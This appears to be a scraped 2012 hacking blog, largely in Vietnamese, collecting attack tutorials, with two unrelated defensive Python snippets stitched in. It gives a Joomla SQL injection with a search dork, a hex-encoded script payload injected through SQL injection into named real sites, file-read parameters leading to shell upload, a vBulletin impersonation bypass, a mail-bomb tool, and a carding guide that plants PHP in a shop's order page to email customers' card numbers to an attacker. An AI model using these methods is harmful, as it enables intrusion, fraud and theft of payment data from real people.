July 27, 2012

Tutorial: Creating a Chinese-Style Hacker Effect with CMD

Joomla [ Sql Injection Vulnerability ]

#########################################################################

[+] Exploit Title : Joomla [ Sql Injection Vulnerability ]
[~] Author : Ne0 H4ck3R
[~] Contact : backtrack1337@hotmail.com
[~] Date : 03-08-2011
[~] HomePage : www.indishell.in
[~] Dork : inurl"com_xeslidegalfx"
[~] Tested on: Joomla 1.5.x
[~] Vendor : http://art-kabbalah.net/component/xeslidegalfx/
[~] Vulnerability Style : com_xeslidegalfx [ Sql Injection Vulnerability ]

#########################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Greetz T0: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, DarkL00k, Th3 RDX, G00g!3 W@rr!0r,
eXeSoul, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor, dodo , darkw0lf, ethical n00b, r00t deviL
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



Vulnerability :-

~ SQL injection Vulnerability ~


[#] http://targetsite/[path]/index.php?option=com_xeslidegalfx&Itemid=&func=detail&id=1

[#] http://targetsite/[path]/index.php?option=com_xeslidegalfx&Itemid=&func=detail&id= [ your skill ]


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


=> c0d3 for motherland, h4ck for motherland



Enj0y!


[#] DOne now time to rock \m/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#

[TUT] Exploiting Chinese sites on Windows servers with the WebDAV bug

Seems a bit old, doesn't it.
Find Chinese sites with the WebDAV bug and try it out.

Download tool: http://www.mediafire.com/?1zopzz113jbba93

VIDEO HD:


http://www.youtube.com/watch?v=ESyF_RPR9vI&feature=youtu.be

Leech from VNW

July 26, 2012

TUT Reg Domain = CCN

Nguyên Liệu : CCN Đủ BL
Mail
Sock Trùng Stale

Nạn Nhân
http://namebargain.com/domain-regist.../default.aspx?

July 25, 2012

Tools Bom Mail PHP

Đã kiểm tra chuẩn 100% inbox trên email , gmail, hotmail,
Bạn nào chưa tin thì cứ để lại mail mình bom thử
Demo:
http://kyuc1010.pro/bom.php

Linkdownload: http://www.mediafire.com/?tn7w7jh2xhunft3
Code Auto SQL Injection (Update)


I - JS for exploiting SQLi



 

Download Code: 
http://www.mediafire.com/?457p1u9c9uv7cw7
pass: VNH

- Upload the JS file to your hosting.
- Use the JS link in the following script:
          <script src='http://link.com/sqli.js'></script>
       Example:

<script src='http://thptquangha.com/sqli.js'></script>

- Then convert the script above to hex.
- This gives:
3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c692e6a73273e3c2f7363726970743e


- Use it in the following expression:


concat((0x mã hex))volcano

Example:
concat((0x3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c692e6a73273e3c2f7363726970743e))volcano

- Done. Now suppose you are exploiting a site that has SQLi
and have found the injectable column numbers. Just insert the string above into one of those columns. The rest is for you to figure out.
(Not every site can be exploited this way.)

- Example with the JS above:
http://kemlam.com/?content=detail&proID=-10+union+select+1,2,3,concat((0x3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c692e6a73273e3c2f7363726970743e))volcano,5,6,7,8,9,10,11,12,13

=======================================


II - Or another JS: this one is easier to read than the one above ;))



download: http://www.mediafire.com/?o9gvag0gl4ggc8d

http://kemlam.com/?content=detail&proID=-10+union+select+1,2,3,concat((0x3c736372697074207372633d27687474703a2f2f746870747175616e6768612e636f6d2f73716c69322e6a73273e3c2f7363726970743e))volcano,5,6,7,8,9,10,11,12,13

July 24, 2012

Reading Any File Without a Shell

These keys come from a bug that some sites overlook.
Keys:
download.php?file=
down.php?filename=
down.php?file_name=
download.php?src=
download.php?f=
...
Download the files one by one, read the config to get the localhost user + pass, log in to phpMyAdmin, take over admin, and upload a shell.

Some examples

Code:
__________________
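
Requests of the kind described in this post are visible in web server access logs. The following is an added example, not part of the original post: it flags requests to download.php / down.php whose file parameter walks out of the download directory or asks for server-side source. The combined log format, the sample lines, and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names from the post's key list, compared case-insensitively.
FILE_PARAMS = {"file", "filename", "file_name", "src", "f"}
SCRIPT_RE = re.compile(r"/(?:down|download)\.php$", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SOURCE_RE = re.compile(r"\.(?:php\d?|phtml|inc|ini|env)$", re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding such as %252e%252e (bounded passes)."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(url):
    """Return the reasons a request URL looks like an arbitrary file read."""
    parts = urlsplit(url)
    if not SCRIPT_RE.search(parts.path):
        return []
    reasons = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() not in FILE_PARAMS:
            continue
        value = fully_decode(raw).replace("\\", "/")
        if ".." in value.split("/"):
            reasons.append("traversal")
        if value.startswith("/") or re.match(r"[A-Za-z]:/", value):
            reasons.append("absolute-path")
        if SOURCE_RE.search(value):
            reasons.append("source-file")
    return reasons

def scan(log_lines):
    """Return (line_number, reasons) for each suspicious access-log line."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        reasons = classify(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample lines in combined log format (documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Jul/2012:10:00:01 +0000] "GET /download.php?file=manual.pdf HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Jul/2012:10:00:09 +0000] "GET /down.php?filename=../index.php HTTP/1.1" 200 812',
    '203.0.113.7 - - [24/Jul/2012:10:00:15 +0000] "GET /download.php?src=%252e%252e%2fconfig.php HTTP/1.1" 200 300',
]
```

A 200 response on a flagged line means the handler served the file; the fix on the server side is to resolve the requested name against a fixed download directory and refuse anything that resolves outside it.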


July 23, 2012

vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability



===============================================================
vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
===============================================================


   010101010101010101010101010101010101010101010101010101010  
   0                                                       0
   1  Iranian Datacoders Security Team 2010                1
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
  

# Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
# Date: 29/08/2010                           
# Author: Immortal Boy                    
# Software Link: http://www.vbulletin.org
# Version: 3.8.4 & 3.8.5
# Google dork 1 : powered by vBulletin 3.8.4
# Google dork 2 : powered by vBulletin 3.8.5
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A
  
#  BUG :  #########################################################################
  
1 > Go to Http://[localhost]/path/register.php

2 > Assume that forum admin user name is ADMIN

3 > Type this at User Name ===> ADMIN&#00

4 > &#00 is an ASCII Code

5 > And complete the other parameters

6 > Then click on Complete Registration

7 > Now you see that your user name looks like the admin user name
  
After this, the private messages sent to the user (ADMIN) will be sent to you.


#  Patch :  #######################################################################

1 > Go to AdminCP

2 > Click on vBulletin Options and choose vBulletin Options

3 > Choose Censorship Options

4 > type &# in Censored Words section

5 > Then click on Save

#############################################################################

Our Website : http://www.datacoders.ir
  
Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute ,

hosinn , NIK , uones , mohammad_ir &  all iranian datacoders members
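
The patch in the advisory above censors the string "&#". As an added example (not part of the advisory and not vBulletin code), the check below generalises that idea: it reduces a submitted name to what a reader would actually see and refuses names that contain entities or invisible characters, or that render the same as an existing account. The `Registry` class and its method names are hypothetical.

```python
import html
import unicodedata


def canonical_username(raw):
    """Reduce a submitted name to the form a reader would actually see."""
    text = html.unescape(raw)  # decodes "&#00" even without a semicolon
    text = unicodedata.normalize("NFKC", text)
    visible = [
        ch for ch in text
        # Drop control/format/unassigned characters, plus the U+FFFD that
        # html.unescape substitutes for an invalid reference such as &#00.
        if not unicodedata.category(ch).startswith("C") and ch != "\ufffd"
    ]
    return "".join(visible).strip().casefold()


class Registry:
    """Hypothetical user store keyed by canonical name."""

    def __init__(self, existing):
        self._taken = {canonical_username(name) for name in existing}

    def register(self, raw):
        """Return (accepted, reason) for a requested user name."""
        canon = canonical_username(raw)
        if not canon:
            return False, "empty after normalisation"
        if canon in self._taken:
            return False, "renders the same as an existing name"
        if canon != raw.strip().casefold():
            return False, "contains entities or invisible characters"
        self._taken.add(canon)
        return True, "ok"
```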

List site lỗi SQL có creditcard


TUT Hack CC

allinurl: /sub.php?Page=1
chuyển về dạng
http://abc.com/detail.php?pid=....
hack bằng tool hoangduye cũng được mà havij cũng được,hack bằng cái gì cũng được

get admin ( trong table user nhớ gét colums role để tìm admin ,pass mã hóa sha1( admin thường thì role là 1)

link admin
http://abc.com/admin_login.php

http://abc.com/cp
vào admin phần category up shell lên để đuôi php hoặc .jpg.php tùy thích

tiếp theo vào shell sửa file orderconfirm.php ( tùy file tùy shop cách tìm file này là vào shop order đến phần nhập cc sau đó hiện comfim sẽ ra name file http://abc.com/file can edit .php

vào shell tìm file đó

sau đó tìm đoạn này

<? echo

"" . substr($card_no,-4) . "<br>" .

$ex_month . "/" . $ex_year . "<br>" .

$cid;

?>
thường thì code gốc là hiện 4 số cuối của cc

sửa số màu đỏ thành số 0

sau đó gán thêm hàm này vào phía dưới
<?

$to = 'tmtno1@vnhack.us';

$subject = 'CC - Order ID:'+$order_id; $message = $order_id."|".$card_type."|".$card_no."|".$ex_mont h."|".$ex_year."|".$cid."|".$bill_name."|".$bill_a ddress."|".$bill_city."|".$bill_state."|".$bill_zi p."|".$bill_dphone."|".$bill_country; $headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" .

'X-Mailer: PHP/' . phpversion();

mail($to, $subject, $message, $headers);

?>
notice : do file order chính mã hóa nên hack cc bằng cách sử file nối đến file order chính,cc k đảm bảo live 100%,chuẩn bill 100%

có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất
